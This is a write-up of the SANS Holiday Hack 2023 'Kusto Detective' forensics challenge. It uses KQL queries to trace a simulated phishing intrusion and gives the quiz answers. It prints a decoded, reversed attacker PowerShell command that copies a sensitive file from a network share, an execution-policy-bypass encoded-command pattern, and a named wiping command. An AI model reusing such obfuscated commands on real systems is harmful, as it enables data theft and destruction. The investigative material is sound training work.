Aniket RT

Kusto Detective - SANS Holiday 2023

You can download the solution set from the link below or follow along with the article.


Onboarding - Welcome to SANS Holiday Hack 2023!

Make sure you create a cluster and run the provided scripts to create the tables and the required functions.


For more information, you can check the FAQs at


Now, this is very easy. The following query should give you the desired output.


Employees
| where hostname contains 'laptop' and role =~ 'craftsperson elf'
| distinct username
| count

Question - How many Craftsperson Elves are working from laptops?


Answer – 25


Case 1 - Welcome to Operation Giftwrap: Defending the Geese Island network


The first question is: What is the email address of the employee who received this phishing email?


This problem gives us the link the attacker used, namely 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'


I checked the SecurityAlerts table but could not find anything.


Hence, I turned my attention to another table, OutboundNetworkEvents, which lists outbound network connections along with the source IP. Following is the query.


OutboundNetworkEvents


Running this query against that URL gives us the source IP, 10.10.0.4.


We also know that the “Employees” table stores employee details such as hostname, username, email address, domain name and so on.


Let us use the source IP to find our employee.

Employees
| where ip_addr == '10.10.0.4'

Another approach is to query the Email table directly:

Email

 

The above query gives us the answers to all the questions in this case.


Q1 - What is the email address of the employee who received this phishing email?


Q2- What is the email address that was used to send this spear phishing email?


Q3 - What was the subject line used in the spear phishing email?

Ans - [EXTERNAL] Invoice foir reindeer food past due


Case 2 - Someone got phished! Let's dig deeper on the victim...


All the details can be fetched from the Employees table.


Following is the query –


Employees
| project role, hostname, ip_addr

Q1- What is the role of our victim in the organization?

Ans- Head Elf


Q2- What is the hostname of the victim's machine?

Ans- Y1US-DESKTOP


Q3- What is the source IP linked to the victim?

Ans- 10.10.0.4


Case 3 - That's not good. What happened next?


Q1 - What time did Alabaster click on the malicious link? Make sure to copy the exact timestamp from the logs!


Query-

OutboundNetworkEvents
| project timestamp

Answer- 2023-12-02T10:12:42Z


Q2- What file is dropped to Alabaster's machine shortly after he downloads the malicious file?


Ans- We can run the following query to check for file creation events, using the hostname we extracted earlier.


FileCreationEvents
| where hostname == 'Y1US-DESKTOP' //'2023-12-02T10:12:42Z'
| sort by timestamp asc

Now we need to look for all events that happened on 2023-12-02 at or after 10:12.


We get the following two results.



The answer is giftwrap.exe


Case 4 - A compromised host! Time for a deep dive.


Q1- The attacker created a reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?


Ans- Here the clue is “IP forwarded to”, so let us look at the ProcessEvents table for command lines containing the string “forward”. We already have the victim's hostname, so let us use that to narrow the search.

 

ProcessEvents
| where hostname == 'Y1US-DESKTOP' and process_commandline contains 'forward'

Following is the output.


The answer is 113.37.9.17


Q2- What is the timestamp when the attackers enumerated network shares on the machine?


Ans- The clue is in the question itself; let us query the same table for the string “share”.


ProcessEvents
| where hostname == 'Y1US-DESKTOP' and process_commandline contains 'share'


The answer is 2023-12-02T16:51:44Z


Q3- What was the hostname of the system the attacker moved laterally to?


Now that we have the parent process hash, let's use it to find the answer.


ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'

We get a few records, and in one of them we can see that a network share location was accessed.


The answer is NorthPolefileshare


Case 5 - A hidden message

For this case, please make sure that you hit the “Train me for this case” button, as it gives a good explanation of base64 encoding and decoding using KQL functions.


Without further ado, let us dive into the questions.


Q1- When was the attacker's first base64 encoded PowerShell command executed on Alabaster's machine?


Ans- We can use the following query to list the commands executed on the victim's machine. The clue here is “powershell”.


ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'
| where process_commandline contains 'powershell.exe'
| sort by timestamp asc


Answer is 2023-12-24T16:07:47Z


Q2- What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)



Decoding the string with the following query gives the output below.

print(base64_decode_tostring("KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn"))

 

Output

( 'txt.tsiLeciNythguaN\potkseD\:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\\ metI-ypoC c- exe.llehsrewop' -split '' | %{$_[0]}) -join ''


Notice that the string is reversed; let us get it back in order.


You can use any online string-reversal page to do the work for you.


'' nioj- )}]0[_${% | '' tilps- 'powershell.exe -c Copy-Item \\NorthPolefileshare\c$\MissionCritical\NaughtyNiceList.txt C:\Desktop\NaughtyNiceList.txt' (


Looking at the above output, we have our answer: NaughtyNiceList.txt


Q3- The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?


Ans- Let us run the same query again and decode the strings from the second and third results.


ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'
| where process_commandline contains 'powershell.exe'
| sort by timestamp asc

Decoding the second string gives the following output.

print(base64_decode_tostring("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"))

 


We can see the output is a join of lots of numbers. I copied the entire number array into Excel and replaced all commas with spaces. I then went to an online decimal-to-ASCII converter and pasted in the number array, as can be seen below.


This gives us our answer: giftbox.com
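As an added example (not part of the original post), the string reversal from Q2 and the Excel plus online-converter steps from Q3 can both be done inside one KQL query. It assumes the column names used in the post's queries, that the encoded command follows the '-enc ' flag as in the Case 6 query, and that the second command's character codes are runs of decimal digits (the post only shows that the output is "a join of lots of numbers").

```kql
// Added example: decode the attacker's base64 PowerShell commands in one
// query instead of pasting them into external tools. Assumes the same
// columns as the post's queries and that the payload follows '-enc '.
ProcessEvents
| where hostname == 'Y1US-DESKTOP'
    and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'
    and process_commandline contains '-enc'
// Everything after the -enc flag is the base64 payload.
| parse-where process_commandline with * '-enc ' base64string
| extend decoded = base64_decode_tostring(base64string)
// Case 5 Q2: the first command hides its text by reversing it,
// which reverse() undoes directly.
| extend reversed = reverse(decoded)
// Case 5 Q3: the second command is a list of decimal character codes
// (assumed to look like 103,105,102,...). Pull out every run of digits
// and turn the code points back into text with make_string().
| extend codepoints = extract_all(@'(\d+)', decoded)
| mv-apply cp = codepoints to typeof(string) on (
    summarize codes = make_list(toint(cp))
  )
| extend from_decimal = make_string(codes)
| project timestamp, decoded, reversed, from_decimal
```

The reversed column is meaningful only for the first command and from_decimal only for the second; the other column on each row is just noise from applying both transforms to every result.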


Case 6 - The final step!


Q1- What is the name of the executable the attackers used in the final malicious command?


Ans- Rather than going back and forth to decode the base64 strings, let us use the parse-where operator to extract the encoded string and decode it within the same query.


ProcessEvents
| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f' and process_commandline contains '-enc'
| parse-where process_commandline with @'C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc ' base64string
| extend DecodedBase64 = base64_decode_tostring(base64string)
| project timestamp, parent_process_name, DecodedBase64



Looking at the last output, we can see the name of the executable: downwithsanta.exe


Q2- What was the command line flag used alongside this executable?

Using the same query as above, the flag used alongside this executable is

–wipeall

 

Congratulations, that is it! You can do the last one to get the decoded base64 string that is

 

